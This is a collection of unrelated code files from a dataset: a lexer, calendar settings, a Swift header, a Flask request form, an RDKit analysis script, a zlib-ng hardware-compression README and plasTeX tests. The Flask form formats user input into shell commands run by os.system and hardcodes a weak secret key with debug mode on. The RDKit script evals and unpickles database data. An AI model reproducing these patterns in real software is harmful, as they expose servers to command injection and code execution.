if not context:
ctx = LexerContext(text, 0)
statetokens = tokendefs['root']
else:
ctx = context
statetokens = tokendefs[ctx.stack[-1]]
text = ctx.text
while 1:
for rexmatch, action, new_state in statetokens:
m = rexmatch(text, ctx.pos, ctx.end)
if m:
if type(action) is _TokenType:
yield ctx.pos, action, m.group()
ctx.pos = m.end()
else:
for item in action(self, m, ctx):
yield item
if not new_state:
# altered the state stack?
statetokens = tokendefs[ctx.stack[-1]]
# CAUTION: callback must set ctx.pos!
if new_state is not None:
# state transition
if isinstance(new_state, tuple):
for state in new_state:
if state == '#pop':
ctx.stack.pop()
elif state == '#push':
ctx.stack.append(statestack[-1])
else:
ctx.stack.append(state)
elif isinstance(new_state, int):
# pop
del ctx.stack[new_state:]
elif new_state == '#push':
ctx.stack.append(ctx.stack[-1])
else:
assert False, "wrong state def: %r" % new_state
statetokens = tokendefs[ctx.stack[-1]]
break
else:
try:
if ctx.pos >= ctx.end:
break
if text[ctx.pos] == '\n':
# at EOL, reset state to "root"
ctx.stack = ['root']
statetokens = tokendefs['root']
yield ctx.pos, Text, u'\n'
ctx.pos += 1
continue
yield ctx.pos, Error, text[ctx.pos]
ctx.pos += 1
except IndexError:
break
def do_insertions(insertions, tokens):
"""
Helper for lexers which must combine the results of several
sublexers.
``insertions`` is a list of ``(index, itokens)`` pairs.
Each ``itokens`` iterable should be inserted at position
``index`` into the token stream given by the ``tokens``
argument.
The result is a combined token stream.
TODO: clean up the code here.
"""
insertions = iter(insertions)
try:
index, itokens = insertions.next()
except StopIteration:
# no insertions
for item in tokens:
yield item
return
realpos = None
insleft = True
# iterate over the token stream where we want to insert
# the tokens from the insertion list.
for i, t, v in tokens:
# first iteration. store the postition of first item
if realpos is None:
realpos = i
oldi = 0
while insleft and i + len(v) >= index:
tmpval = v[oldi:index - i]
yield realpos, t, tmpval
realpos += len(tmpval)
for it_index, it_token, it_value in itokens:
yield realpos, it_token, it_value
realpos += len(it_value)
oldi = index - i
try:
index, itokens = insertions.next()
except StopIteration:
insleft = False
break # not strictly necessary
yield realpos, t, v[oldi:]
realpos += len(v) - oldi
# leftover tokens
while insleft:
# no normal tokens, set realpos to zero
realpos = realpos or 0
for p, t, v in itokens:
yield realpos, t, v
realpos += len(v)
try:
index, itokens = insertions.next()
except StopIteration:
insleft = False
break # not strictly necessary | unknown | codeparrot/codeparrot-clean | ||
from .models import Event
OPTIONS = """{ timeFormat: "H:mm",
header: {
left: 'prev,next today',
center: 'title',
right: 'month,agendaWeek,agendaDay',
},
allDaySlot: false,
firstDay: 0,
timezone: 'UTC-6',
weekMode: 'liquid',
slotMinutes: 15,
defaultEventMinutes: 30,
minTime: 8,
maxTime: 20,
editable: false,
dayClick: function(date, allDay, jsEvent, view) {
if (allDay) {
$('#calendar').fullCalendar('gotoDate', date)
$('#calendar').fullCalendar('changeView', 'agendaDay')
}
},
eventClick: function(event, jsEvent, view) {
if (view.name == 'month') {
$('#calendar').fullCalendar('gotoDate', event.start)
$('#calendar').fullCalendar('changeView', 'agendaDay')
}
},
}""" | unknown | codeparrot/codeparrot-clean | ||
//===--- IndirectTypeInfo.h - Convenience for indirected types --*- C++ -*-===//
//
// This source file is part of the Swift.org open source project
//
// Copyright (c) 2014 - 2017 Apple Inc. and the Swift project authors
// Licensed under Apache License v2.0 with Runtime Library Exception
//
// See https://swift.org/LICENSE.txt for license information
// See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
//
//===----------------------------------------------------------------------===//
//
// This file defines IndirectTypeInfo, which is a convenient abstract
// implementation of TypeInfo for working with types that are always
// passed or returned indirectly.
//
//===----------------------------------------------------------------------===//
#ifndef SWIFT_IRGEN_INDIRECTTYPEINFO_H
#define SWIFT_IRGEN_INDIRECTTYPEINFO_H
#include "Explosion.h"
#include "TypeInfo.h"
#include "IRGenFunction.h"
namespace swift {
namespace irgen {
/// IndirectTypeInfo - An abstract class designed for use when
/// implementing a type which is always passed indirectly.
///
/// Subclasses must implement the following operations:
/// allocateStack
/// assignWithCopy
/// initializeWithCopy
/// destroy
template <class Derived, class Base>
class IndirectTypeInfo : public Base {
protected:
template <class... T> IndirectTypeInfo(T &&...args)
: Base(::std::forward<T>(args)...) {}
const Derived &asDerived() const {
return static_cast<const Derived &>(*this);
}
public:
void getSchema(ExplosionSchema &schema) const override {
schema.add(ExplosionSchema::Element::forAggregate(this->getStorageType(),
this->getBestKnownAlignment()));
}
void initializeFromParams(IRGenFunction &IGF, Explosion ¶ms, Address dest,
SILType T, bool isOutlined) const override {
Address src = this->getAddressForPointer(params.claimNext());
asDerived().Derived::initializeWithTake(IGF, dest, src, T, isOutlined,
/*zeroizeIfSensitive=*/ true);
}
void assignWithTake(IRGenFunction &IGF, Address dest, Address src, SILType T,
bool isOutlined) const override {
asDerived().Derived::destroy(IGF, dest, T, isOutlined);
asDerived().Derived::initializeWithTake(IGF, dest, src, T, isOutlined,
/*zeroizeIfSensitive=*/ true);
}
};
}
}
#endif | c | github | https://github.com/apple/swift | lib/IRGen/IndirectTypeInfo.h |
import os
from flask import Flask, request, redirect, url_for, render_template, jsonify
from flask_wtf import Form
from wtforms import StringField, TextField, TextAreaField, DateField, SelectField, RadioField, BooleanField
from wtforms.validators import DataRequired
app = Flask(__name__)
import smtplib
from email.mime.text import MIMEText
def send_mail(form):
first = form.first.data
last = form.last.data
email = form.email.data
description = form.description.data
crawl_type = form.crawl_type.data
recurring = form.recurring.data
seed_ulrs = form.seed_ulrs.data
crawling_config = form.crawling_config.data
content_type = form.content_type.data
how_much_data = form.how_much_data.data
custom_metrics = form.custom_metrics.data
extraction = form.extraction.data
common_data_repository = form.common_data_repository.data
raw_files = form.raw_files.data
nutch_sequence_files = form.nutch_sequence_files.data
custom_schema = form.custom_schema.data
common_crawl_format = form.common_crawl_format.data
warc = form.warc.data
needed_by = form.needed_by.data
client_email = "mail -s 'Memex Crawl Request' {0} <<< 'Thank you for submitting your crawl data acquisition request to NASA JPL. Someone from the Crawl Team will contact you personally certainly within the next 24 hours. Our Crawl Infrastructure is already working on acquiring your requested data. If you have any issues, please do not hesitate to contact us on memex-crawl@jpl.nasa.gov. Thank you'".format(email)
memex_email = "mail -s '[New Crawl Request]' memex-jpl@googlegroups.com <<< 'Request details: \n First Name:{0} \n Last Name:{1} \n Email: {2} \n Description: {3} \n Crawl Type: {4} \n Recurring: {5} \n Seed Urls: {6} \n Crawling Config: {7} \n Content Type: {8} \n How much data: {9} \n Custom Metrics: {10} \n Extraction: {11} \n Common Data Repository: {12} \n Raw Files: {13} \n Nutch Sequence: {14} \n Custom Schema: {15} \n Common Crawl Format: {16} \n WARC: {17} \n Needed by: {18} \n \n Thanks \n Memex Crawl Team'".format(first, last, email, description, crawl_type, recurring, seed_ulrs, crawling_config, content_type, how_much_data, custom_metrics, extraction, common_data_repository, raw_files, nutch_sequence_files, custom_schema, common_crawl_format, warc, needed_by)
os.system(client_email)
os.system(memex_email)
class MyForm(Form):
first = StringField('First', validators=[DataRequired()])
last = StringField('Last', validators=[DataRequired()])
email = StringField('Email', validators=[DataRequired()])
description = TextAreaField('Description of Use Case', validators=[DataRequired()])
crawl_type = RadioField(u'Crawl Type', choices=[('exploratory', 'Exploratory'), ('defined', 'Defined'), ('particula_depth', 'Particula Depth')])
recurring = StringField('Recurring', validators=[DataRequired()])
seed_ulrs = TextAreaField('Seed Urls', validators=[DataRequired()])
crawling_config = TextAreaField('Crawling configuration request', validators=[DataRequired()])
content_type = RadioField('Content Type', choices=[('images', 'Images'), ('videos', 'Videos'), ('multimedia', 'Multimedia (images + videos)'), ('everything', 'Everything')])
how_much_data = StringField('How much data', validators=[DataRequired()])
custom_metrics = StringField('Custom Metrics', validators=[DataRequired()])
extraction = TextAreaField('Extraction', validators=[DataRequired()])
common_data_repository = BooleanField('Common Data Repository', validators=[DataRequired(False)])
raw_files = BooleanField('Raw files', validators=[DataRequired(False)])
nutch_sequence_files = BooleanField('Nutch Sequence Files', validators=[DataRequired(False)])
custom_schema = BooleanField('Custom Schema', validators=[DataRequired(False)])
common_crawl_format = BooleanField('Common Crawl Format', validators=[DataRequired(False)])
warc = BooleanField('WARC', validators=[DataRequired(False)])
needed_by = StringField('Needed by', validators=[DataRequired(False)])
@app.route('/', methods=('GET', 'POST'))
def index():
message = "Welcome to the DARPA Memex crawl data request CrawlForm provided by NASA JPL. This form enables clients to submit jobs to be processed and delivered by the NASA JPL Team. A member of the Crawl Team will also reach out and ensure that the Crawl job meets your specifications and exceptions. We encourage you to provide as much input into the fields below as possible."
form = MyForm()
error = ""
if form.validate_on_submit():
send_mail(form)
return redirect('/success')
else:
pass
return render_template('index.html', form=form, error=error, message=message, backhome="")
@app.route("/success")
def success():
backhome = "True"
message = "Thank you for submitting your crawl data acquisition request to NASA JPL. Someone from the Crawl Team will contact you personally certainly within the next 24 hours. Our Crawl Infrastructure is already working on acquiring your requested data. If you have any issues, please do not hesitate to contact us on memex-crawl@jpl.nasa.gov. Thank you"
return render_template('index.html', message=message, backhome=backhome)
if __name__ == "__main__":
app.debug = True
app.secret_key = 's3cr3t'
app.run(host="0.0.0.0", port=4000, debug=True) | unknown | codeparrot/codeparrot-clean | ||
# $Id$
#
# Copyright (C) 2002-2008 greg Landrum and Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
""" command line utility to report on the contributions of descriptors to
tree-based composite models
Usage: AnalyzeComposite [optional args] <models>
<models>: file name(s) of pickled composite model(s)
(this is the name of the db table if using a database)
Optional Arguments:
-n number: the number of levels of each model to consider
-d dbname: the database from which to read the models
-N Note: the note string to search for to pull models from the database
-v: be verbose whilst screening
"""
from __future__ import print_function
import sys
import numpy
from rdkit.Dbase.DbConnection import DbConnect
from rdkit.ML import ScreenComposite
from rdkit.ML.Data import Stats
from rdkit.ML.DecTree import TreeUtils, Tree
from rdkit.six.moves import cPickle
__VERSION_STRING = "2.2.0"
def ProcessIt(composites, nToConsider=3, verbose=0):
composite = composites[0]
nComposites = len(composites)
ns = composite.GetDescriptorNames()
# nDesc = len(ns)-2
if len(ns) > 2:
globalRes = {}
nDone = 1
descNames = {}
for composite in composites:
if verbose > 0:
print('#------------------------------------')
print('Doing: ', nDone)
nModels = len(composite)
nDone += 1
res = {}
for i in range(len(composite)):
model = composite.GetModel(i)
if isinstance(model, Tree.TreeNode):
levels = TreeUtils.CollectLabelLevels(model, {}, 0, nToConsider)
TreeUtils.CollectDescriptorNames(model, descNames, 0, nToConsider)
for descId in levels.keys():
v = res.get(descId, numpy.zeros(nToConsider, numpy.float))
v[levels[descId]] += 1. / nModels
res[descId] = v
for k in res:
v = globalRes.get(k, numpy.zeros(nToConsider, numpy.float))
v += res[k] / nComposites
globalRes[k] = v
if verbose > 0:
for k in res.keys():
name = descNames[k]
strRes = ', '.join(['%4.2f' % x for x in res[k]])
print('%s,%s,%5.4f' % (name, strRes, sum(res[k])))
print()
if verbose >= 0:
print('# Average Descriptor Positions')
retVal = []
for k in globalRes:
name = descNames[k]
if verbose >= 0:
strRes = ', '.join(['%4.2f' % x for x in globalRes[k]])
print('%s,%s,%5.4f' % (name, strRes, sum(globalRes[k])))
tmp = [name]
tmp.extend(globalRes[k])
tmp.append(sum(globalRes[k]))
retVal.append(tmp)
if verbose >= 0:
print()
else:
retVal = []
return retVal
def ErrorStats(conn, where, enrich=1):
fields = ('overall_error,holdout_error,overall_result_matrix,' +
'holdout_result_matrix,overall_correct_conf,overall_incorrect_conf,' +
'holdout_correct_conf,holdout_incorrect_conf')
try:
data = conn.GetData(fields=fields, where=where)
except Exception:
import traceback
traceback.print_exc()
return None
nPts = len(data)
if not nPts:
sys.stderr.write('no runs found\n')
return None
overall = numpy.zeros(nPts, numpy.float)
overallEnrich = numpy.zeros(nPts, numpy.float)
oCorConf = 0.0
oInCorConf = 0.0
holdout = numpy.zeros(nPts, numpy.float)
holdoutEnrich = numpy.zeros(nPts, numpy.float)
hCorConf = 0.0
hInCorConf = 0.0
overallMatrix = None
holdoutMatrix = None
for i in range(nPts):
if data[i][0] is not None:
overall[i] = data[i][0]
oCorConf += data[i][4]
oInCorConf += data[i][5]
if data[i][1] is not None:
holdout[i] = data[i][1]
haveHoldout = 1
else:
haveHoldout = 0
tmpOverall = 1. * eval(data[i][2])
if enrich >= 0:
overallEnrich[i] = ScreenComposite.CalcEnrichment(tmpOverall, tgt=enrich)
if haveHoldout:
tmpHoldout = 1. * eval(data[i][3])
if enrich >= 0:
holdoutEnrich[i] = ScreenComposite.CalcEnrichment(tmpHoldout, tgt=enrich)
if overallMatrix is None:
if data[i][2] is not None:
overallMatrix = tmpOverall
if haveHoldout and data[i][3] is not None:
holdoutMatrix = tmpHoldout
else:
overallMatrix += tmpOverall
if haveHoldout:
holdoutMatrix += tmpHoldout
if haveHoldout:
hCorConf += data[i][6]
hInCorConf += data[i][7]
avgOverall = sum(overall) / nPts
oCorConf /= nPts
oInCorConf /= nPts
overallMatrix /= nPts
oSort = numpy.argsort(overall)
oMin = overall[oSort[0]]
overall -= avgOverall
devOverall = numpy.sqrt(sum(overall**2) / (nPts - 1))
res = {}
res['oAvg'] = 100 * avgOverall
res['oDev'] = 100 * devOverall
res['oCorrectConf'] = 100 * oCorConf
res['oIncorrectConf'] = 100 * oInCorConf
res['oResultMat'] = overallMatrix
res['oBestIdx'] = oSort[0]
res['oBestErr'] = 100 * oMin
if enrich >= 0:
mean, dev = Stats.MeanAndDev(overallEnrich)
res['oAvgEnrich'] = mean
res['oDevEnrich'] = dev
if haveHoldout:
avgHoldout = sum(holdout) / nPts
hCorConf /= nPts
hInCorConf /= nPts
holdoutMatrix /= nPts
hSort = numpy.argsort(holdout)
hMin = holdout[hSort[0]]
holdout -= avgHoldout
devHoldout = numpy.sqrt(sum(holdout**2) / (nPts - 1))
res['hAvg'] = 100 * avgHoldout
res['hDev'] = 100 * devHoldout
res['hCorrectConf'] = 100 * hCorConf
res['hIncorrectConf'] = 100 * hInCorConf
res['hResultMat'] = holdoutMatrix
res['hBestIdx'] = hSort[0]
res['hBestErr'] = 100 * hMin
if enrich >= 0:
mean, dev = Stats.MeanAndDev(holdoutEnrich)
res['hAvgEnrich'] = mean
res['hDevEnrich'] = dev
return res
def ShowStats(statD, enrich=1):
statD = statD.copy()
statD['oBestIdx'] = statD['oBestIdx'] + 1
txt = """
# Error Statistics:
\tOverall: %(oAvg)6.3f%% (%(oDev)6.3f) %(oCorrectConf)4.1f/%(oIncorrectConf)4.1f
\t\tBest: %(oBestIdx)d %(oBestErr)6.3f%%""" % (statD)
if 'hAvg' in statD:
statD['hBestIdx'] = statD['hBestIdx'] + 1
txt += """
\tHoldout: %(hAvg)6.3f%% (%(hDev)6.3f) %(hCorrectConf)4.1f/%(hIncorrectConf)4.1f
\t\tBest: %(hBestIdx)d %(hBestErr)6.3f%%
""" % (statD)
print(txt)
print()
print('# Results matrices:')
print('\tOverall:')
tmp = numpy.transpose(statD['oResultMat'])
colCounts = sum(tmp)
rowCounts = sum(tmp, 1)
for i in range(len(tmp)):
if rowCounts[i] == 0:
rowCounts[i] = 1
row = tmp[i]
print('\t\t', end='')
for j in range(len(row)):
print('% 6.2f' % row[j], end='')
print('\t| % 4.2f' % (100. * tmp[i, i] / rowCounts[i]))
print('\t\t', end='')
for i in range(len(tmp)):
print('------', end='')
print()
print('\t\t', end='')
for i in range(len(tmp)):
if colCounts[i] == 0:
colCounts[i] = 1
print('% 6.2f' % (100. * tmp[i, i] / colCounts[i]), end='')
print()
if enrich > -1 and 'oAvgEnrich' in statD:
print('\t\tEnrich(%d): %.3f (%.3f)' % (enrich, statD['oAvgEnrich'], statD['oDevEnrich']))
if 'hResultMat' in statD:
print('\tHoldout:')
tmp = numpy.transpose(statD['hResultMat'])
colCounts = sum(tmp)
rowCounts = sum(tmp, 1)
for i in range(len(tmp)):
if rowCounts[i] == 0:
rowCounts[i] = 1
row = tmp[i]
print('\t\t', end='')
for j in range(len(row)):
print('% 6.2f' % row[j], end='')
print('\t| % 4.2f' % (100. * tmp[i, i] / rowCounts[i]))
print('\t\t', end='')
for i in range(len(tmp)):
print('------', end='')
print()
print('\t\t', end='')
for i in range(len(tmp)):
if colCounts[i] == 0:
colCounts[i] = 1
print('% 6.2f' % (100. * tmp[i, i] / colCounts[i]), end='')
print()
if enrich > -1 and 'hAvgEnrich' in statD:
print('\t\tEnrich(%d): %.3f (%.3f)' % (enrich, statD['hAvgEnrich'], statD['hDevEnrich']))
return
def Usage():
print(__doc__)
sys.exit(-1)
if __name__ == "__main__":
import getopt
try:
args, extras = getopt.getopt(sys.argv[1:], 'n:d:N:vX', ('skip',
'enrich=', ))
except Exception:
Usage()
count = 3
db = None
note = ''
verbose = 0
skip = 0
enrich = 1
for arg, val in args:
if arg == '-n':
count = int(val) + 1
elif arg == '-d':
db = val
elif arg == '-N':
note = val
elif arg == '-v':
verbose = 1
elif arg == '--skip':
skip = 1
elif arg == '--enrich':
enrich = int(val)
composites = []
if db is None:
for arg in extras:
composite = cPickle.load(open(arg, 'rb'))
composites.append(composite)
else:
tbl = extras[0]
conn = DbConnect(db, tbl)
if note:
where = "where note='%s'" % (note)
else:
where = ''
if not skip:
pkls = conn.GetData(fields='model', where=where)
composites = []
for pkl in pkls:
pkl = str(pkl[0])
comp = cPickle.loads(pkl)
composites.append(comp)
if len(composites):
ProcessIt(composites, count, verbose=verbose)
elif not skip:
print('ERROR: no composite models found')
sys.exit(-1)
if db:
res = ErrorStats(conn, where, enrich=enrich)
if res:
ShowStats(res) | unknown | codeparrot/codeparrot-clean | ||
# Introduction
This directory contains SystemZ deflate hardware acceleration support.
It can be enabled using the following build commands:
$ ./configure --with-dfltcc-deflate --with-dfltcc-inflate
$ make
or
$ cmake -DWITH_DFLTCC_DEFLATE=1 -DWITH_DFLTCC_INFLATE=1 .
$ make
When built like this, zlib-ng would compress using hardware on level 1,
and using software on all other levels. Decompression will always happen
in hardware. In order to enable hardware compression for levels 1-6
(i.e. to make it used by default) one could add
`-DDFLTCC_LEVEL_MASK=0x7e` to CFLAGS when building zlib-ng.
SystemZ deflate hardware acceleration is available on [IBM z15](
https://www.ibm.com/products/z15) and newer machines under the name [
"Integrated Accelerator for zEnterprise Data Compression"](
https://www.ibm.com/support/z-content-solutions/compression/). The
programming interface to it is a machine instruction called DEFLATE
CONVERSION CALL (DFLTCC). It is documented in Chapter 26 of [Principles
of Operation](https://publibfp.dhe.ibm.com/epubs/pdf/a227832c.pdf). Both
the code and the rest of this document refer to this feature simply as
"DFLTCC".
# Performance
Performance figures are published [here](
https://github.com/iii-i/zlib-ng/wiki/Performance-with-dfltcc-patch-applied-and-dfltcc-support-built-on-dfltcc-enabled-machine
). The compression speed-up can be as high as 110x and the decompression
speed-up can be as high as 15x.
# Limitations
Two DFLTCC compression calls with identical inputs are not guaranteed to
produce identical outputs. Therefore care should be taken when using
hardware compression when reproducible results are desired. In
particular, zlib-ng-specific `zng_deflateSetParams` call allows setting
`Z_DEFLATE_REPRODUCIBLE` parameter, which disables DFLTCC support for a
particular stream.
DFLTCC does not support every single zlib-ng feature, in particular:
* `inflate(Z_BLOCK)` and `inflate(Z_TREES)`
* `inflateMark()`
* `inflatePrime()`
* `inflateSyncPoint()`
When used, these functions will either switch to software, or, in case
this is not possible, gracefully fail.
# Code structure
All SystemZ-specific code lives in `arch/s390` directory and is
integrated with the rest of zlib-ng using hook macros.
## Hook macros
DFLTCC takes as arguments a parameter block, an input buffer, an output
buffer, and a window. Parameter blocks are stored alongside zlib states;
buffers are forwarded from the caller; and window - which must be
4k-aligned and is always 64k large, is managed using the `PAD_WINDOW()`,
`WINDOW_PAD_SIZE`, `HINT_ALIGNED_WINDOW` and `DEFLATE_ADJUST_WINDOW_SIZE()`
and `INFLATE_ADJUST_WINDOW_SIZE()` hooks.
Software and hardware window formats do not match, therefore,
`deflateSetDictionary()`, `deflateGetDictionary()`, `inflateSetDictionary()`
and `inflateGetDictionary()` need special handling, which is triggered using
`DEFLATE_SET_DICTIONARY_HOOK()`, `DEFLATE_GET_DICTIONARY_HOOK()`,
`INFLATE_SET_DICTIONARY_HOOK()` and `INFLATE_GET_DICTIONARY_HOOK()` macros.
`deflateResetKeep()` and `inflateResetKeep()` update the DFLTCC
parameter block using `DEFLATE_RESET_KEEP_HOOK()` and
`INFLATE_RESET_KEEP_HOOK()` macros.
`INFLATE_PRIME_HOOK()`, `INFLATE_MARK_HOOK()` and
`INFLATE_SYNC_POINT_HOOK()` macros make the respective unsupported
calls gracefully fail.
`DEFLATE_PARAMS_HOOK()` implements switching between hardware and
software compression mid-stream using `deflateParams()`. Switching
normally entails flushing the current block, which might not be possible
in low memory situations. `deflateParams()` uses `DEFLATE_DONE()` hook
in order to detect and gracefully handle such situations.
The algorithm implemented in hardware has different compression ratio
than the one implemented in software. `DEFLATE_BOUND_ADJUST_COMPLEN()`
and `DEFLATE_NEED_CONSERVATIVE_BOUND()` macros make `deflateBound()`
return the correct results for the hardware implementation.
Actual compression and decompression are handled by `DEFLATE_HOOK()` and
`INFLATE_TYPEDO_HOOK()` macros. Since inflation with DFLTCC manages the
window on its own, calling `updatewindow()` is suppressed using
`INFLATE_NEED_UPDATEWINDOW()` macro.
In addition to compression, DFLTCC computes CRC-32 and Adler-32
checksums, therefore, whenever it's used, software checksumming is
suppressed using `DEFLATE_NEED_CHECKSUM()` and `INFLATE_NEED_CHECKSUM()`
macros.
While software always produces reproducible compression results, this
is not the case for DFLTCC. Therefore, zlib-ng users are given the
ability to specify whether or not reproducible compression results
are required. While it is always possible to specify this setting
before the compression begins, it is not always possible to do so in
the middle of a deflate stream - the exact conditions for that are
determined by `DEFLATE_CAN_SET_REPRODUCIBLE()` macro.
## SystemZ-specific code
When zlib-ng is built with DFLTCC, the hooks described above are
converted to calls to functions, which are implemented in
`arch/s390/dfltcc_*` files. The functions can be grouped in three broad
categories:
* Base DFLTCC support, e.g. wrapping the machine instruction - `dfltcc()`.
* Translating between software and hardware data formats, e.g.
`dfltcc_deflate_set_dictionary()`.
* Translating between software and hardware state machines, e.g.
`dfltcc_deflate()` and `dfltcc_inflate()`.
The functions from the first two categories are fairly simple, however,
various quirks in both software and hardware state machines make the
functions from the third category quite complicated.
### `dfltcc_deflate()` function
This function is called by `deflate()` and has the following
responsibilities:
* Checking whether DFLTCC can be used with the current stream. If this
is not the case, then it returns `0`, making `deflate()` use some
other function in order to compress in software. Otherwise it returns
`1`.
* Block management and Huffman table generation. DFLTCC ends blocks only
when explicitly instructed to do so by the software. Furthermore,
whether to use fixed or dynamic Huffman tables must also be determined
by the software. Since looking at data in order to gather statistics
would negate performance benefits, the following approach is used: the
first `DFLTCC_FIRST_FHT_BLOCK_SIZE` bytes are placed into a fixed
block, and every next `DFLTCC_BLOCK_SIZE` bytes are placed into
dynamic blocks.
* Writing EOBS. Block Closing Control bit in the parameter block
instructs DFLTCC to write EOBS, however, certain conditions need to be
met: input data length must be non-zero or Continuation Flag must be
set. To put this in simpler terms, DFLTCC will silently refuse to
write EOBS if this is the only thing that it is asked to do. Since the
code has to be able to emit EOBS in software anyway, in order to avoid
tricky corner cases Block Closing Control is never used. Whether to
write EOBS is instead controlled by `soft_bcc` variable.
* Triggering block post-processing. Depending on flush mode, `deflate()`
must perform various additional actions when a block or a stream ends.
`dfltcc_deflate()` informs `deflate()` about this using
`block_state *result` parameter.
* Converting software state fields into hardware parameter block fields,
and vice versa. For example, `wrap` and Check Value Type or `bi_valid`
and Sub-Byte Boundary. Certain fields cannot be translated and must
persist untouched in the parameter block between calls, for example,
Continuation Flag or Continuation State Buffer.
* Handling flush modes and low-memory situations. These aspects are
quite intertwined and pervasive. The general idea here is that the
code must not do anything in software - whether explicitly by e.g.
calling `send_eobs()`, or implicitly - by returning to `deflate()`
with certain return and `*result` values, when Continuation Flag is
set.
* Ending streams. When a new block is started and flush mode is
`Z_FINISH`, Block Header Final parameter block bit is used to mark
this block as final. However, sometimes an empty final block is
needed, and, unfortunately, just like with EOBS, DFLTCC will silently
refuse to do this. The general idea of DFLTCC implementation is to
rely as much as possible on the existing code. Here in order to do
this, the code pretends that it does not support DFLTCC, which makes
`deflate()` call a software compression function, which writes an
empty final block. Whether this is required is controlled by
`need_empty_block` variable.
* Error handling. This is simply converting
Operation-Ending-Supplemental Code to string. Errors can only happen
due to things like memory corruption, and therefore they don't affect
the `deflate()` return code.
### `dfltcc_inflate()` function
This function is called by `inflate()` from the `TYPEDO` state (that is,
when all the metadata is parsed and the stream is positioned at the type
bits of deflate block header) and it's responsible for the following:
* Falling back to software when flush mode is `Z_BLOCK` or `Z_TREES`.
Unfortunately, there is no way to ask DFLTCC to stop decompressing on
block or tree boundary.
* `inflate()` decompression loop management. This is controlled using
the return value, which can be either `DFLTCC_INFLATE_BREAK` or
`DFLTCC_INFLATE_CONTINUE`.
* Converting software state fields into hardware parameter block fields,
and vice versa. For example, `whave` and History Length or `wnext` and
History Offset.
* Ending streams. This instructs `inflate()` to return `Z_STREAM_END`
and is controlled by `last` state field.
* Error handling. Like deflate, error handling comprises
Operation-Ending-Supplemental Code to string conversion. Unlike
deflate, errors may happen due to bad inputs, therefore they are
propagated to `inflate()` by setting `mode` field to `MEM` or `BAD`.
# Testing
Given complexity of DFLTCC machine instruction, it is not clear whether
QEMU TCG will ever support it. At the time of writing, one has to have
access to an IBM z15+ VM or LPAR in order to test DFLTCC support. Since
DFLTCC is a non-privileged instruction, neither special VM/LPAR
configuration nor root are required.
zlib-ng CI uses an IBM-provided z15 self-hosted builder for the DFLTCC
testing. There is no official IBM Z GitHub Actions runner, so we build
one inspired by `anup-kodlekere/gaplib`.
Future updates to actions-runner might need an updated patch. The .net
version number patch has been separated into a separate file to avoid a
need for constantly changing the patch.
## Configuring the builder.
### Install prerequisites.
```
sudo dnf install podman
```
### Add actions-runner service.
```
sudo cp self-hosted-builder/actions-runner.service /etc/systemd/system/
sudo systemctl daemon-reload
```
### Create a config file, needs github personal access token.
```
# Create file /etc/actions-runner
repo=<owner>/<name>
access_token=<ghp_***>
```
Access token should have the repo scope, consult
https://docs.github.com/en/rest/reference/actions#create-a-registration-token-for-a-repository
for details.
### Autostart actions-runner.
```
$ sudo systemctl enable --now actions-runner
```
## Rebuilding the container
In order to update the `gaplib-actions-runner` podman container, e.g. to get the
latest OS security fixes, follow these steps:
```
# Stop actions-runner service
sudo systemctl stop actions-runner
# Delete old container
sudo podman container rm gaplib-actions-runner
# Delete old image
sudo podman image rm localhost/zlib-ng/actions-runner
# Build image
sudo podman build --squash -f Dockerfile.zlib-ng --tag zlib-ng/actions-runner --build-arg .
# Build container
sudo podman create --name=gaplib-actions-runner --env-file=/etc/actions-runner --init --interactive --volume=actions-runner-temp:/home/actions-runner zlib-ng/actions-runner
# Start actions-runner service
sudo systemctl start actions-runner
``` | unknown | github | https://github.com/opencv/opencv | 3rdparty/zlib-ng/arch/s390/README.md |
#!/usr/bin/env python
import unittest, sys
from unittest import TestCase
from plasTeX.Tokenizer import *
from plasTeX.TeX import *
class Numbers(TestCase):
def testReadDecimal(self):
s = TeX()
s.input(r'-1.0')
i = s.readDecimal()
assert i == -1, 'expected -1, but got %s' % i
s = TeX()
s.input(r'-11234.0')
i = s.readDecimal()
assert i == -11234, 'expected -11234, but got %s' % i
s = TeX()
s.input(r'0.0')
i = s.readDecimal()
assert i == 0, 'expected 0, but got %s' % i
def testReadDimen(self):
fuzz = 1e-3
s = TeX()
s.input(r'3 in')
i = s.readDimen()
assert i.inch - 3 < fuzz, i.inch
s = TeX()
s.input(r'29 pc')
i = s.readDimen()
assert i.pc - 29 < fuzz, i.pc
s = TeX()
s.input(r'-.013837in')
i = s.readDimen()
assert i.inch - -0.013837 < fuzz, i.inch
s = TeX()
s.input(r'+ 42,1 dd')
i = s.readDimen()
assert i.dd - 42.1 < fuzz, i.dd
s = TeX()
s.input(r'0.mm')
i = s.readDimen()
assert i.mm - 0 < fuzz, i.mm
s = TeX()
s.input(r'123456789sp')
i = s.readDimen()
assert i.sp - 123456789 < fuzz, i.sp
def testReadDimen2(self):
# This is illegal
# s = TeX()
# s.input(r"'.77pt")
# i = s.readDimen()
# s = TeX()
# s.input(r'"Ccc')
# i = s.readDimen()
s = TeX()
s.input(r'-,sp')
i = s.readDimen()
assert i.sp == 0, i.sp
def testUnitConversion(self):
fuzz = 1e-3
s = TeX()
s.input(r'1 pc')
i = s.readDimen()
assert i.pt - 12 < fuzz, i.pt
s = TeX()
s.input(r'1 in')
i = s.readDimen()
assert i.pt - 72.27 < fuzz, i.pt
s = TeX()
s.input(r'72 bp')
i = s.readDimen()
assert i.inch - 1 < fuzz, i.inch
s = TeX()
s.input(r'2.54 cm')
i = s.readDimen()
assert i.inch - 1 < fuzz, i.inch
s = TeX()
s.input(r'10 mm')
i = s.readDimen()
assert i.cm - 1 < fuzz, i.cm
s = TeX()
s.input(r'1157 dd')
i = s.readDimen()
assert i.pt - 1238 < fuzz, i.pt
s = TeX()
s.input(r'1 cc')
i = s.readDimen()
assert i.dd - 12 < fuzz, i.dd
s = TeX()
s.input(r'65536 sp')
i = s.readDimen()
assert i.pt - 1 < fuzz, i.pt
def testReadGlue(self):
s = TeX()
s.input(r'0pt plus 1fil')
i = s.readGlue()
assert i.pt == 0, i.pt
assert i.stretch.fil == 1, i.stretch.fil
assert i.shrink is None, i.shrink
s = TeX()
s.input(r'0pt plus 1fill')
i = s.readGlue()
assert i.pt == 0, i.pt
assert i.stretch.fil == 1, i.stretch.fil
assert i.shrink is None, i.shrink
s = TeX()
s.input(r'0pt plus 1fil minus 1 fil')
i = s.readGlue()
assert i.pt == 0, i.pt
